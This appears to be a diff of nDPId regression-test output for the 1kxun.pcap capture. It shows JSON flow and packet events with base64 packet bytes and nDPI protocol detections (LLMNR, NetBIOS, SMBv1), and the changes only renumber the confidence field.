00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1470104390945,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104390945,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
@@ -273,33 +273,33 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1470104391208,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391208,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0a70AAC4G7uxA6b2AwKhzCABQwa1HQonO9XiAjYAQAVdRKwAAAQEFCvV4gIz1eICN"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":63659,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1470104391254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391254,"pkt":"AQBeAAD8PKn0WgOECABFAAA0HuAAAAER9UjAqAPs4AAA\/MoCFOsAIFaUxmsAAAABAAAAAAAABmlzYXRhcAAAAQAB"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391254,"flow_last_seen":1470104391254,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104391254,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":51714,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1470104391361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1470104391361,"pkt":"MzMAAQADPKn0WgOEht1gAAAAACARAf6AAAAAAAAAXZJiqOveExn\/AgAAAAAAAAAAAAAAAQAD+KsU6wAgEMLGawAAAAEAAAAAAAAGaXNhdGFwAAABAAE="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1470104391362,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104391362,"pkt":"AQBeAAD8PKn0WgOECABFAAA0HuEAAAER9UfAqAPs4AAA\/MoCFOsAIFaUxmsAAAABAAAAAAAABmlzYXRhcAAAAQAB"} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1470104391458,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1470104391458,"pkt":"AQBef\/\/66LH8q\/uyCABFAAClCe4AAAQR9obAqAUx7\/\/\/+sn4B2wAkYV1TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1470104391564,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104391564,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHugAAIARlnrAqAPswKj\/\/wCJAIkAOqdmilEBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":720,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104391564,"flow_last_seen":1470104391564,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104391564,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104392072,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00881{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1470104392072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104392072,"pkt":"\/\/\/\/\/\/\/\/wKC7c+tXCABFAAFZOwBAAEARsV\/AqIyM\/\/\/\/\/\/YA9gABRQTx\/\/\/Z1aAAwKC7c+tXwKiMjAAAAgAnAURHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTd2l0Y2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMuMTAuMDEzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwKC7c+tXQjEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABRUDBSMUQ5MDAwMDI2AAAAAAAAAAAAAAAAAAAAAAAAAERHUy0xMjEwLTEwUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqIyM\/\/8AAFBvcnQgOAAAIAGwIAAGAADCoLv\/\/nPrV0A="} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":200000,"flow_min_l4_payload_len":329,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1470104392072,"l3_proto":"ip6","src_ip":"2001:b020:6::c2a0:bbff:fe73:eb57","dst_ip":"ff02::1","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1470104392072,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":391,"pkt_l4_len":337,"thread_ts_msec":1470104392072,"pkt":"MzMAAAABwKC7c+tXht1gAAAAAVERgCABsCAABgAAwqC7\/\/5z61f\/AgAAAAAAAAAAAAAAAAAB9gD2AAFRMAf\/D9nVoADAoLtz61cgAbAgAAYAAMKgu\/\/+c+tXAAACACcBREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFN3aXRjaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMy4xMC4wMTMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAoLtz61dCMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFQMFIxRDkwMDAwMjYAAAAAAAAAAAAAAAAAAAAAAAAAREdTLTEyMTAtMTBQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMCojIz\/\/wAAUG9ydCA4AAAgAbAgAAYAAMKgu\/\/+c+tXQA=="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1470104392380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104392380,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOckUAAEARgdzAqAUtwKj\/\/+mNAIkAOs9OABUBEAABAAAAAAAAIEZERUJFT0VLRUpDTkVNRUpFR0VGRUNFUEVQRUxDTkNBAAAgAAE="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392380,"flow_last_seen":1470104392380,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104392380,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59789,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1470104393097,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393097,"pkt":"\/\/\/\/\/\/\/\/PKn0WgOECABFAABOHxQAAIARlk7AqAPswKj\/\/wCJAIkAOqdmilEBEAABAAAAAAAAIEVKRkRFQkZFRUJGQUNBQ0FDQUNBQ0FDQUNBQ0FDQUFBAAAgAAE="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOGrEAAEAR2XDAqAUtwKj\/\/+hFAIkAOjOmABcBEAABAAAAAAAAIEVIRUdFSkVNRUZDQUNBQ0FDQUNBQ0FDQUNBQ0FDQUNBAAAgAAE="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":59461,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAABOnJgAAEARV4nAqAUtwKj\/\/wCJAIkAOr16RfsBEAABAAAAAAAAIEVPRUJGREVHRUpFTUVGQ0FDQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":746,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADKO0kAAEARuFzAqAUtwKj\/\/wCKAIoAtoWlEQJF7sCoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAO1FEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTsRQAA"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":747,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104393610,"flow_last_seen":1470104393610,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1470104393610,"l3_proto":"ip4","src_ip":"192.168.5.45","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1470104393610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1470104393610,"pkt":"\/\/\/\/\/\/\/\/4KzLceHQCABFAADK5DUAAEARD3DAqAUtwKj\/\/wCKAIoAtoasEQJF8cCoBS0AAACgAAAgRU5FQkVERUNFUEVQRUxFQkVKRkNDTkVGREJFRURBQUEAIEVORkRFSUVQRU5FRkNBQ0FDQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAA1TQAAPBFEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQTvRQAA"} 
